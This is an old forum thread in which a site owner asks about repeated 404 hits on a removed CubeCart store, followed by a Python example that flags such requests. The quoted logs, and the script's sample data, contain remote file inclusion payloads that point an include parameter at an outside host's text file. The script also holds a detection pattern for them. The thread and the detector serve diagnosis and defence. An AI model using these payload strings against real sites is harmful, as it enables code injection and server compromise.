
What does this mean? Keep getting hits to this URL



Guest aliceaod

I recently removed my cube cart store because I'm not selling what I was selling anymore but I do use cubecart at another site, so this has me concerned.

Since I removed the one store I'm getting a ton of 404 Errors being generated from bots (or something) hitting the following URI and I don't know what this means. I finally had to put a "banme.php" on the addy to make them stop.

What is this addy and why are they going there? I tried to google it but didn't find anything.

Is it some kind of way people are trying to download the digital files I once was selling and were downloading them for free?

Greetings! From BanMe.php: Banned--10/11/09 10:51:58 AM CDT. I banned IP 61.19.245.143 from the requested URI www.webgeek-design.com//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt? They came from referrer [ ] with user agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)

The following error was received on Sunday, October 11, 2009 - 09:00:58 AM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt?

Referring URL: "http://www.webgeek-design.com"

IP Address: 122.155.5.84

The following error was received on Sunday, October 11, 2009 - 09:00:58 AM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com/%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt?

Referring URL: "http://www.webgeek-design.com"

IP Address: 122.155.5.84

The following error was received on Sunday, October 11, 2009 - 08:55:38 AM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com/%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt?

Referring URL: "http://www.webgeek-design.com"

IP Address: 122.155.5.84

(122.155.5.84 generated over 20 Errors of this nature)


Guest aliceaod

Thanks but as stated, I totally removed the store so don't have the files any more and I have absolutely no idea how long this has been going on. I'll check any back ups that I might still have to see if I can find anything there.

I replaced all the files with the last cubecart update so if it did happen, it would have been after the latest release came out (and I updated shortly after it was released).

<shrug>

I googled http://moncosZ.fileave.com/pirid1.txt? and it shows up all over the place but no one explaining what it is.

Link to comment
Share on other sites

The TXT file will likely be HTML to display in the page.

The message above is referencing includes/orderSuccess.inc.php, so look in there. If it's clean, and dated the same as the shipped version, then contact your hosting company as they will need to know their server may have been compromised.


Guest aliceaod


Thanks. I'll do a winmerge on the back up that I have with the shipped version since the date is the same...so IDK...but thanks yeah I'll tell my web host.


Guest aliceaod

Here is their brilliant answer:

Regarding 404 error, it is because there is no such page available. Seems your script banme.php is sending emails to you. If you don't want to receive emails you can rename that file.

hhhoooookay then, fine. I'm not going to worry about it.

But, still I'd love to know what that is. I got another one today

The following error was received on Monday, October 12, 2009 - 03:11:19 PM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com/%20%20//includes/orderSuccess

Referring URL: "http://www.webgeek-design.com"

IP Address: 203.193.165.130

Are they looking for an exploit? Is that what this is?

Link to comment
Share on other sites

What payment gateways did you use for the old store? The confirmed.php is what is called after an order is placed and your payment gateway reports the sale back to cubecart. You said you moved the store - did you change the configuration of all your payment gateways to reflect the new URL?

It looks to me like you forgot to change the "return to store" url for a gateway and people are trying to place orders (or are placing them) and the gateway is sending them to the old URL.


Guest aliceaod


The payment gateway was PayPal.

Thanks for trying to help, but I think you misunderstand. What I did was I removed the store. It's gone, bye bye, adios, c ya, no longer exists, defunct, closed, shut down, files deleted. I am, however, using the same CubeCart script at another domain selling entirely different products and with these weird errors I was getting at webgeek, I was concerned about the other one because I didn't know if this was something trying to find an exploit or was actually successful at it.

I found something interesting today...I am also getting 404 errors at a totally unrelated site that mention a miomatrimonio.com with a .txt file in the URI, like this moncosZ thing. I googled miomatrimonio.com, apparently what is happening at webgeek IS an attack on the server, it's just that they are failing. The scary part is that if they are successful, I'd have no way of knowing...would I?

Here's the BOT LIST I found mentioning the miomatrimonio thing http://simaps.net/

Link to comment
Share on other sites

Right, I understand that you moved the cart files to a different domain. In Paypal though, there is a setting for "return to url" - did you perhaps forget to change the domain name there to the new site? If so, it would be trying to find the confirmed.php file on the domain where the file no longer exists - hence the message you are getting.

I tried to find it in Paypal, but cannot find the setting. It's there somewhere.


Guest aliceaod


Thanks for trying to help, but my bad for not being more clear.

I did not move anything to another domain.

The error messages I am getting are not PayPal error messages. They are attempted attacks on my server.

Link to comment
Share on other sites
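An added example, not part of any post in this thread: a small Python triage routine for requests like the ones reported above, where a query parameter aimed at an include file carries a remote URL. The sample entries are constructed, `files.example.test` is a placeholder host, and the function names and verdict labels are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed (status, request URI) pairs modelled on the 404 reports quoted in
# the thread; files.example.test and the last two requests are placeholders.
SAMPLE = [
    (404, "//includes/orderSuccess.inc.php?glob=1&cart_order_id=1"
          "&glob[rootDir]=http://files.example.test/x.txt?"),
    (404, "/%20%20//includes/orderSuccess.inc.php?glob=1"
          "&glob%5BrootDir%5D=HTTP%3A%2F%2Ffiles.example.test%2Fx.txt%3F"),
    (200, "/includes/orderSuccess.inc.php?glob[rootDir]=http://files.example.test/x.txt?"),
    (200, "/index.php?act=viewProd&productId=12"),
    (200, "/out.php?url=https://partner.example.test/"),
]

REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
ARRAY_NAME = re.compile(r"^[^\[\]]+\[[^\[\]]*\]")  # e.g. glob[rootDir]

def inspect_request(status, uri):
    """Return a finding for an inclusion-style probe, or None if nothing matches."""
    # Split by hand: urlsplit() would read the leading "//" as a host name.
    path, _, query = uri.partition("?")
    clean_path = unquote(path).strip()
    include_path = clean_path.lower().endswith(".inc.php")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes
        # Heuristic: a remote URL as a value is only flagged when it is aimed
        # at an include file or at an array element of a variable.
        if REMOTE_VALUE.match(value) and (include_path or ARRAY_NAME.match(name)):
            hits.append((name, value.strip()))
    if not hits:
        return None
    return {
        "path": clean_path,
        "params": hits,
        # 404 means the target script was absent, so the request ran nothing.
        # Any other status means the script exists and the host needs checking.
        "verdict": "probe-failed" if status == 404 else "investigate",
    }

def triage(entries):
    """Map each flagged request URI to its verdict."""
    findings = ((uri, inspect_request(status, uri)) for status, uri in entries)
    return {uri: f["verdict"] for uri, f in findings if f}

if __name__ == "__main__":
    for uri, verdict in triage(SAMPLE).items():
        print(verdict, uri)
```

An "investigate" verdict only says the requested script exists on the host; it is a prompt to compare that file against the shipped version and review the server, as suggested earlier in the thread.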
